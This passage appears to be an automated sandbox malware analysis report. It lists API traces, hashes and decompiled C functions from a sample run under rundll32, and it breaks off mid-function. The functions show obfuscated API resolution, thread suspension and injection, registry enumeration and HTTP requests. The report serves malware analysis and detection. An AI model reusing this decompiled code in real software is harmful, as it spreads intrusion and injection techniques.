                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                            • String ID:
                            • API String ID: 2831207796-0
                            • Opcode ID: 0f57f2bf6824a8a8a4d1c4953b234fb64d0aab89cc7a5c14241f244406bfdc87
                            • Instruction ID: 99572f695af237b990bccf25bb9235251a1bf055762a16cf82be8b59cc2a87d5
                            • Opcode Fuzzy Hash: 0f57f2bf6824a8a8a4d1c4953b234fb64d0aab89cc7a5c14241f244406bfdc87
                            • Instruction Fuzzy Hash: A3414C36D00609AFEB01DFACD844A9EB7B9EF49311F144426ED14EB260DA75A906CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F6C5E7
                              • Part of subcall function 04F7212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,04F6111D,00000000), ref: 04F7214D
                              • Part of subcall function 04F7212C: GetProcAddress.KERNEL32(00000000,?), ref: 04F72166
                              • Part of subcall function 04F7212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,04F6111D,00000000), ref: 04F72183
                              • Part of subcall function 04F7212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,04F6111D,00000000), ref: 04F72194
                              • Part of subcall function 04F7212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,04F6111D,00000000), ref: 04F721A7
                            • ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,761B4EE0,00000000), ref: 04F6C6A1
                            • WaitForSingleObject.KERNEL32(00000064), ref: 04F6C6AF
                            • SuspendThread.KERNEL32(00000004), ref: 04F6C6C2
                              • Part of subcall function 04F76DE0: memset.NTDLL ref: 04F770AA
                            • ResumeThread.KERNEL32(00000004), ref: 04F6C745
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                            • String ID:
                            • API String ID: 2397206891-0
                            • Opcode ID: 5fd0b1a64bf09c582ac3abb9a56a8cfe98ee42064477240acbf22b02e920b712
                            • Instruction ID: 861c362ba33c9d2ed32a83dec45cfef9b23a6aecaf73cf9f964ed544a9c0136f
                            • Opcode Fuzzy Hash: 5fd0b1a64bf09c582ac3abb9a56a8cfe98ee42064477240acbf22b02e920b712
                            • Instruction Fuzzy Hash: 8B41CF72900248AFEF11AF64CC88AAE7BB9EF04344F04446AE98A96110D735EE52CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLastError.KERNEL32(?,?,80000000,00000001,?,04F860C0,00000018,04F64B2B,?,00000201,04F89A24,04F899DC,-0000000C,?), ref: 04F75843
                            • VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,?,?,?,80000000,00000001,?,04F860C0,00000018,04F64B2B), ref: 04F758CE
                            • RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F758F7
                            • RtlLeaveCriticalSection.NTDLL(04F8A400), ref: 04F75915
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                            • String ID:
                            • API String ID: 3666628472-0
                            • Opcode ID: b13b9ecea8d025107db90447ce8273007afc0cd45fbf758798d03b6f675f30c4
                            • Instruction ID: 299bb2d2872634363e3419fd6e4dd3dab7d5777265fa676952fac6e0098cbc1d
                            • Opcode Fuzzy Hash: b13b9ecea8d025107db90447ce8273007afc0cd45fbf758798d03b6f675f30c4
                            • Instruction Fuzzy Hash: 94414C71900709EFDB11DF65C884AAEBBF5FF08310B10951AE825EB650D779BA52CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,04F6C71A,04F6C71A,?,04F76EFA,?,04F6C71A,?,?,00000000), ref: 04F78F87
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F78FA9
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F78FBF
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F78FD5
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F78FEB
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F79001
                              • Part of subcall function 04F6710A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000), ref: 04F67167
                              • Part of subcall function 04F6710A: memset.NTDLL ref: 04F6718B
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                            • String ID:
                            • API String ID: 3012371009-0
                            • Opcode ID: 581fef9ca9a2d7761fcb5b694ff1aee5af0253b12e4d1fac3c09319f49bd538c
                            • Instruction ID: 4eca1aca732183cb79860a173725cdad217eba89fe8fcbefd1cf29301709f9fc
                            • Opcode Fuzzy Hash: 581fef9ca9a2d7761fcb5b694ff1aee5af0253b12e4d1fac3c09319f49bd538c
                            • Instruction Fuzzy Hash: 91210CB1A1060AEFE711DF69E845D6ABBECEF04244705846FE505CB251E7B8E9068F60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A144DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                            				intOrPtr _v8;
                            				intOrPtr _t23;
                            				intOrPtr _t26;
                            				_Unknown_base(*)()* _t28;
                            				intOrPtr _t30;
                            				_Unknown_base(*)()* _t32;
                            				intOrPtr _t33;
                            				_Unknown_base(*)()* _t35;
                            				intOrPtr _t36;
                            				_Unknown_base(*)()* _t38;
                            				intOrPtr _t39;
                            				_Unknown_base(*)()* _t41;
                            				intOrPtr _t44;
                            				struct HINSTANCE__* _t48;
                            				intOrPtr _t54;
                            
                            				_t54 = E04A16D63(0x20);
                            				if(_t54 == 0) {
                            					_v8 = 8;
                            				} else {
                            					_t23 =  *0x4a1a348; // 0xb1d5a8
                            					_t1 = _t23 + 0x4a1b11a; // 0x4c44544e
                            					_t48 = GetModuleHandleA(_t1);
                            					_t26 =  *0x4a1a348; // 0xb1d5a8
                            					_t2 = _t26 + 0x4a1b761; // 0x7243775a
                            					_v8 = 0x7f;
                            					_t28 = GetProcAddress(_t48, _t2);
                            					 *(_t54 + 0xc) = _t28;
                            					if(_t28 == 0) {
                            						L8:
                            						E04A16C2C(_t54);
                            					} else {
                            						_t30 =  *0x4a1a348; // 0xb1d5a8
                            						_t5 = _t30 + 0x4a1b74e; // 0x614d775a
                            						_t32 = GetProcAddress(_t48, _t5);
                            						 *(_t54 + 0x10) = _t32;
                            						if(_t32 == 0) {
                            							goto L8;
                            						} else {
                            							_t33 =  *0x4a1a348; // 0xb1d5a8
                            							_t7 = _t33 + 0x4a1b771; // 0x6e55775a
                            							_t35 = GetProcAddress(_t48, _t7);
                            							 *(_t54 + 0x14) = _t35;
                            							if(_t35 == 0) {
                            								goto L8;
                            							} else {
                            								_t36 =  *0x4a1a348; // 0xb1d5a8
                            								_t9 = _t36 + 0x4a1b4ca; // 0x4e6c7452
                            								_t38 = GetProcAddress(_t48, _t9);
                            								 *(_t54 + 0x18) = _t38;
                            								if(_t38 == 0) {
                            									goto L8;
                            								} else {
                            									_t39 =  *0x4a1a348; // 0xb1d5a8
                            									_t11 = _t39 + 0x4a1b786; // 0x6c43775a
                            									_t41 = GetProcAddress(_t48, _t11);
                            									 *(_t54 + 0x1c) = _t41;
                            									if(_t41 == 0) {
                            										goto L8;
                            									} else {
                            										 *((intOrPtr*)(_t54 + 4)) = _a4;
                            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                            										_t44 = E04A1190C(_t54, _a8); // executed
                            										_v8 = _t44;
                            										if(_t44 != 0) {
                            											goto L8;
                            										} else {
                            											 *_a12 = _t54;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _v8;
                            			}

                            APIs
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04A14046,?,?,?,?,00000000,00000000), ref: 04A14503
                            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04A14525
                            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04A1453B
                            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04A14551
                            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04A14567
                            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04A1457D
                              • Part of subcall function 04A1190C: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000,04A1459D), ref: 04A11969
                              • Part of subcall function 04A1190C: memset.NTDLL ref: 04A1198B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                            • String ID:
                            • API String ID: 3012371009-0
                            • Opcode ID: 8422b1bd0c2645b96ab2477330037f4b8fe638bc1ab20ade67daae28cedec267
                            • Instruction ID: c176b6259ddf9001f7b3fe13062350b5e28934a87d4cd92e20d8ba7d4ed9161f
                            • Opcode Fuzzy Hash: 8422b1bd0c2645b96ab2477330037f4b8fe638bc1ab20ade67daae28cedec267
                            • Instruction Fuzzy Hash: F62137B560170AAFE711DF69C884E9AB7FCEB58710B054426E946C7230E774FD05CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A16954(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                            				void* __esi;
                            				long _t10;
                            				void* _t18;
                            				void* _t22;
                            
                            				_t9 = __eax;
                            				_t22 = __eax;
                            				if(_a4 != 0) {
                            					_t9 = E04A145C4(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
                            					if(_t9 == 0) {
                            						L9:
                            						return GetLastError();
                            					}
                            				}
                            				_t10 = E04A17AF1(_t9, _t18, _t22, _a8); // executed
                            				if(_t10 == 0) {
                            					ResetEvent( *(_t22 + 0x1c));
                            					ResetEvent( *(_t22 + 0x20));
                            					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                            						SetEvent( *(_t22 + 0x1c));
                            						goto L7;
                            					} else {
                            						_t10 = GetLastError();
                            						if(_t10 == 0x3e5) {
                            							L7:
                            							_t10 = 0;
                            						}
                            					}
                            				}
                            				if(_t10 == 0xffffffff) {
                            					goto L9;
                            				}
                            				return _t10;
                            			}

                            APIs
                            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04A137A0,?,?,761F81D0,00000000), ref: 04A1698E
                            • ResetEvent.KERNEL32(?), ref: 04A16993
                            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04A169A0
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?,?), ref: 04A169AB
                            • GetLastError.KERNEL32(?,?,00000102,04A137A0,?,?,761F81D0,00000000), ref: 04A169C6
                              • Part of subcall function 04A145C4: lstrlen.KERNEL32(00000000,00000008,?,761B4D40,?,?,04A16973,?,?,?,?,00000102,04A137A0,?,?,761F81D0), ref: 04A145D0
                              • Part of subcall function 04A145C4: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04A16973,?,?,?,?,00000102,04A137A0,?), ref: 04A1462E
                              • Part of subcall function 04A145C4: lstrcpy.KERNEL32(00000000,00000000), ref: 04A1463E
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?), ref: 04A169B9
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                            • String ID:
                            • API String ID: 3739416942-0
                            • Opcode ID: bce7d6918b21518cf11e0bdb40b6f3b3a7eb225a49ad7fb52cc2e417c2eb6e49
                            • Instruction ID: 18fa862bd010342a5c55dfeb6cc36edc7c6d39d51200cfe4b43ec519af44f41a
                            • Opcode Fuzzy Hash: bce7d6918b21518cf11e0bdb40b6f3b3a7eb225a49ad7fb52cc2e417c2eb6e49
                            • Instruction Fuzzy Hash: 9A016971104610ABEB306F75EE44F5BBBA8EF897B5F100A25F592D10F0DB21F809DA61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,00000000,04F7893A,04F8A174,04F80998), ref: 04F773C1
                            • QueueUserAPC.KERNEL32(04F7893A,00000000,?,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773D6
                            • GetLastError.KERNEL32(00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773E1
                            • TerminateThread.KERNEL32(00000000,00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773EB
                            • CloseHandle.KERNEL32(00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773F2
                            • SetLastError.KERNEL32(00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773FB
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                            • String ID:
                            • API String ID: 3832013932-0
                            • Opcode ID: f91ab3a8fbf151b7c5504fbf962543e583f5687fbd0d16ae37a9dd6d66facc18
                            • Instruction ID: 7a863c4d7359c0d5fc50868e80cd33b6beed30f514ed9367d0e704bb3dc890d5
                            • Opcode Fuzzy Hash: f91ab3a8fbf151b7c5504fbf962543e583f5687fbd0d16ae37a9dd6d66facc18
                            • Instruction Fuzzy Hash: F7F05832604A29BBD7221FA0BC08F6FBFA8FB09759F04940DF60198140C7289C018B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E04A13472(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                            				signed int _v8;
                            				char _v12;
                            				signed int* _v16;
                            				char _v284;
                            				void* __esi;
                            				char* _t59;
                            				intOrPtr* _t60;
                            				void* _t62;
                            				intOrPtr _t64;
                            				char _t65;
                            				void* _t67;
                            				intOrPtr _t68;
                            				intOrPtr _t69;
                            				void* _t70;
                            				intOrPtr _t71;
                            				void* _t73;
                            				signed int _t81;
                            				void* _t91;
                            				void* _t92;
                            				char _t98;
                            				signed int* _t100;
                            				intOrPtr* _t101;
                            				void* _t102;
                            
                            				_t92 = __ecx;
                            				_v8 = _v8 & 0x00000000;
                            				_t98 = _a16;
                            				if(_t98 == 0) {
                            					__imp__( &_v284,  *0x4a1a3dc);
                            					_t91 = 0x80000002;
                            					L6:
                            					_t59 = E04A161FC( &_v284,  &_v284);
                            					_a8 = _t59;
                            					if(_t59 == 0) {
                            						_v8 = 8;
                            						L29:
                            						_t60 = _a20;
                            						if(_t60 != 0) {
                            							 *_t60 =  *_t60 + 1;
                            						}
                            						return _v8;
                            					}
                            					_t101 = _a24;
                            					_t62 = E04A16F28(_t92, _t97, _t101, _t91, _t59); // executed
                            					if(_t62 != 0) {
                            						L27:
                            						E04A16C2C(_a8);
                            						goto L29;
                            					}
                            					_t64 =  *0x4a1a318; // 0x5539d70
                            					_t16 = _t64 + 0xc; // 0x5539e92
                            					_t65 = E04A161FC(_t64,  *_t16);
                            					_a24 = _t65;
                            					if(_t65 == 0) {
                            						L14:
                            						_t29 = _t101 + 0x14; // 0x102
                            						_t33 = _t101 + 0x10; // 0x3d04a190, executed
                            						_t67 = E04A14822(_t97,  *_t33, _t91, _a8,  *0x4a1a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                            						if(_t67 == 0) {
                            							_t68 =  *0x4a1a348; // 0xb1d5a8
                            							if(_t98 == 0) {
                            								_t35 = _t68 + 0x4a1ba4c; // 0x4d4c4b48
                            								_t69 = _t35;
                            							} else {
                            								_t34 = _t68 + 0x4a1ba47; // 0x55434b48
                            								_t69 = _t34;
                            							}
                            							_t70 = E04A162F6(_t69,  *0x4a1a3d4,  *0x4a1a3d8,  &_a24,  &_a16); // executed
                            							if(_t70 == 0) {
                            								if(_t98 == 0) {
                            									_t71 =  *0x4a1a348; // 0xb1d5a8
                            									_t44 = _t71 + 0x4a1b842; // 0x74666f53
                            									_t73 = E04A161FC(_t44, _t44);
                            									_t99 = _t73;
                            									if(_t73 == 0) {
                            										_v8 = 8;
                            									} else {
                            										_t47 = _t101 + 0x10; // 0x3d04a190
                            										E04A174B6( *_t47, _t91, _a8,  *0x4a1a3d8, _a24);
                            										_t49 = _t101 + 0x10; // 0x3d04a190
                            										E04A174B6( *_t49, _t91, _t99,  *0x4a1a3d0, _a16);
                            										E04A16C2C(_t99);
                            									}
                            								} else {
                            									_t40 = _t101 + 0x10; // 0x3d04a190, executed
                            									E04A174B6( *_t40, _t91, _a8,  *0x4a1a3d8, _a24); // executed
                            									_t43 = _t101 + 0x10; // 0x3d04a190
                            									E04A174B6( *_t43, _t91, _a8,  *0x4a1a3d0, _a16);
                            								}
                            								if( *_t101 != 0) {
                            									E04A16C2C(_a24);
                            								} else {
                            									 *_t101 = _a16;
                            								}
                            							}
                            						}
                            						goto L27;
                            					}
                            					_t21 = _t101 + 0x10; // 0x3d04a190, executed
                            					_t81 = E04A112CA( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                            					if(_t81 == 0) {
                            						_t100 = _v16;
                            						if(_v12 == 0x28) {
                            							 *_t100 =  *_t100 & _t81;
                            							_t26 = _t101 + 0x10; // 0x3d04a190
                            							E04A14822(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                            						}
                            						E04A16C2C(_t100);
                            						_t98 = _a16;
                            					}
                            					E04A16C2C(_a24);
                            					goto L14;
                            				}
                            				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                            					goto L29;
                            				} else {
                            					_t97 = _a8;
                            					E04A17A1E(_t98, _a8,  &_v284);
                            					__imp__(_t102 + _t98 - 0x117,  *0x4a1a3dc);
                            					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                            					_t91 = 0x80000003;
                            					goto L6;
                            				}
                            			}

                            APIs
                            • StrChrA.SHLWAPI(04A17168,0000005F,00000000,00000000,00000104), ref: 04A134A5
                            • lstrcpy.KERNEL32(?,?), ref: 04A134D2
                              • Part of subcall function 04A161FC: lstrlen.KERNEL32(?,00000000,05539D70,00000000,04A139E8,05539F93,69B25F44,?,?,?,?,69B25F44,00000005,04A1A00C,4D283A53,?), ref: 04A16203
                              • Part of subcall function 04A161FC: mbstowcs.NTDLL ref: 04A1622C
                              • Part of subcall function 04A161FC: memset.NTDLL ref: 04A1623E
                              • Part of subcall function 04A174B6: lstrlenW.KERNEL32(?,?,?,04A1363B,3D04A190,80000002,04A17168,04A17283,74666F53,4D4C4B48,04A17283,?,3D04A190,80000002,04A17168,?), ref: 04A174DB
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            • lstrcpy.KERNEL32(?,00000000), ref: 04A134F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
• Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                            • String ID: ($\
                            • API String ID: 3924217599-1512714803
                            • Opcode ID: 1e15f45cbb73abebdb9d4bb5efe10b8b0030d3ba4fbade0bc6e7c1d9dbd99160
                            • Instruction ID: e71edb24d073eef408a9e60b60afd0a13031ba1188446705fccb24354319feef
                            • Opcode Fuzzy Hash: 1e15f45cbb73abebdb9d4bb5efe10b8b0030d3ba4fbade0bc6e7c1d9dbd99160
                            • Instruction Fuzzy Hash: 89515A76500209EFEF229FA0DD40EEB3BBAEF18354F008519FA6596170D735E926EB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A171B6(void* __ecx, intOrPtr _a4) {
                            				int* _v8;
                            				int _v12;
                            				int* _v16;
                            				int _v20;
                            				int* _v24;
                            				char* _v28;
                            				void* _v32;
                            				long _t33;
                            				char* _t35;
                            				long _t39;
                            				long _t42;
                            				intOrPtr _t47;
                            				void* _t51;
                            				long _t53;
                            
                            				_t51 = __ecx;
                            				_v8 = 0;
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v24 = 0;
                            				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                            				_t53 = _t33;
                            				if(_t53 != 0) {
                            					L18:
                            					return _t53;
                            				}
                            				_t53 = 8;
                            				_t35 = E04A16D63(0x104);
                            				_v28 = _t35;
                            				if(_t35 == 0) {
                            					L17:
                            					RegCloseKey(_v32); // executed
                            					goto L18;
                            				}
                            				_v20 = 0x104;
                            				do {
                            					_v16 = _v20;
                            					_v12 = 0x104;
                            					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                            					_t53 = _t39;
                            					if(_t53 != 0xea) {
                            						if(_t53 != 0) {
                            							L14:
                            							if(_t53 == 0x103) {
                            								_t53 = 0;
                            							}
                            							L16:
                            							E04A16C2C(_v28);
                            							goto L17;
                            						}
                            						_t42 = E04A13472(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                            						_t53 = _t42;
                            						if(_t53 != 0) {
                            							goto L14;
                            						}
                            						goto L12;
                            					}
                            					if(_v12 <= 0x104) {
                            						if(_v16 <= _v20) {
                            							goto L16;
                            						}
                            						E04A16C2C(_v24);
                            						_v20 = _v16;
                            						_t47 = E04A16D63(_v16);
                            						_v24 = _t47;
                            						if(_t47 != 0) {
                            							L6:
                            							_t53 = 0;
                            							goto L12;
                            						}
                            						_t53 = 8;
                            						goto L16;
                            					}
                            					_v8 = _v8 + 1;
                            					goto L6;
                            					L12:
                            				} while (WaitForSingleObject( *0x4a1a30c, 0) == 0x102);
                            				goto L16;
                            			}

                            APIs
                            • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04A17168,?), ref: 04A171DC
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • RegEnumKeyExA.KERNEL32(?,?,?,04A17168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04A17168), ref: 04A17223
                            • WaitForSingleObject.KERNEL32(00000000,?,?,?,04A17168,?,04A17168,?,?,?,?,?,04A17168,?), ref: 04A17290
                            • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04A17168,?), ref: 04A172B8
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
• Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                            • String ID: !]t
                            • API String ID: 3664505660-1252899741
                            • Opcode ID: 5ea95172ef231ba288ac85b84413bd4233bc6754362393251a2cd0aa65b5df6a
                            • Instruction ID: 476510ebbdd1590b5adcccff467a1eb833ccef15946bb374fed3fc61103c3680
                            • Opcode Fuzzy Hash: 5ea95172ef231ba288ac85b84413bd4233bc6754362393251a2cd0aa65b5df6a
                            • Instruction Fuzzy Hash: 5B316C79D00119AFDF22AFA5DD849EEFFB9EB48710F104026F951BA120D2751A82DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 57%
                            			E04A13D2C(signed int __edx) {
                            				signed int _v8;
                            				long _v12;
                            				CHAR* _v16;
                            				long _v20;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t21;
                            				CHAR* _t22;
                            				CHAR* _t25;
                            				intOrPtr _t26;
                            				void* _t27;
                            				void* _t31;
                            				void* _t32;
                            				CHAR* _t36;
                            				CHAR* _t42;
                            				CHAR* _t43;
                            				CHAR* _t44;
                            				void* _t49;
                            				void* _t51;
                            				signed char _t56;
                            				intOrPtr _t58;
                            				signed int _t59;
                            				void* _t63;
                            				CHAR* _t67;
                            				CHAR* _t68;
                            				char* _t69;
                            				void* _t70;
                            
                            				_t61 = __edx;
                            				_v20 = 0;
                            				_v8 = 0;
                            				_v12 = 0;
                            				_t21 = E04A13CFD();
                            				if(_t21 != 0) {
                            					_t59 =  *0x4a1a2fc; // 0x4000000a
                            					_t55 = (_t59 & 0xf0000000) + _t21;
                            					 *0x4a1a2fc = (_t59 & 0xf0000000) + _t21;
                            				}
                            				_t22 =  *0x4a1a178(0, 2); // executed
                            				_v16 = _t22;
                            				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                            					_t25 = E04A1389E( &_v8,  &_v20); // executed
                            					_t54 = _t25;
                            					_t26 =  *0x4a1a348; // 0xb1d5a8
                            					if( *0x4a1a2fc > 5) {
                            						_t8 = _t26 + 0x4a1b5c5; // 0x4d283a53
                            						_t27 = _t8;
                            					} else {
                            						_t7 = _t26 + 0x4a1b9fd; // 0x44283a44
                            						_t27 = _t7;
                            					}
                            					E04A16B80(_t27, _t27);
                            					_t31 = E04A176BB(_t61,  &_v20,  &_v12); // executed
                            					if(_t31 == 0) {
                            						CloseHandle(_v20);
                            					}
                            					_t63 = 5;
                            					if(_t54 != _t63) {
                            						 *0x4a1a310 =  *0x4a1a310 ^ 0x81bbe65d;
                            						_t32 = E04A16D63(0x60);
                            						 *0x4a1a3cc = _t32;
                            						__eflags = _t32;
                            						if(_t32 == 0) {
                            							_push(8);
                            							_pop(0);
                            						} else {
                            							memset(_t32, 0, 0x60);
                            							_t49 =  *0x4a1a3cc; // 0x55395b0
                            							_t70 = _t70 + 0xc;
                            							__imp__(_t49 + 0x40);
                            							_t51 =  *0x4a1a3cc; // 0x55395b0
                            							 *_t51 = 0x4a1b827;
                            						}
                            						_t54 = 0;
                            						__eflags = 0;
                            						if(0 == 0) {
